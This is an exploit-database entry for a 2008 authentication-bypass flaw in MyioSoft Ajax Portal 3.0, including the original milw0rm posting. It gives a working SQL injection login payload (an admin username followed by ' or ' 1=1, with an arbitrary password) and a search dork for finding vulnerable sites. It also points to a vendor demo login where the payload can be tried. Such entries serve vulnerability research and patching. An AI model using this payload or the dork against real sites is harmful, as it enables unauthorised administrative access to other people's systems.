header-logo
Suggest Exploit
vendor:
Ajax Portal
by:
ZoRLu
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Ajax Portal
Affected Version From: 3
Affected Version To: 3
Patch Exists: Yes
Related CWE: N/A
CPE: a:myiosoft:ajax_portal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MyioSoft Ajax Portal 3.0 Remote Auth Bypass Vulnerability

A vulnerability in MyioSoft Ajax Portal 3.0 allows an attacker to bypass authentication by using the username [real_admin_name] ' or ' 1=1 and the password ZoRLu. The admin name is generally 'admin'. A demo of the exploit can be found at http://myiosoft.com/products/AjaxPortal/demo/ with the username demo1 ' or ' 1=1 and the password ZoRLu.

Mitigation:

Update to the latest version of MyioSoft Ajax Portal 3.0.
Source

Exploit-DB raw data:

[~] MyioSoft Ajax Portal 3.0 Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 07.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork: "Powered by Ajax Portal 3.0"
[~]
[~] -----------------------------------------------------------

Exploit:

username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )

password: ZoRLu

note: generally admin name: admin


admin login for demo:

http://myiosoft.com/products/AjaxPortal/demo/


example for demo:

admin: demo1 ' or ' 1=1

passwd: ZoRLu

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-07]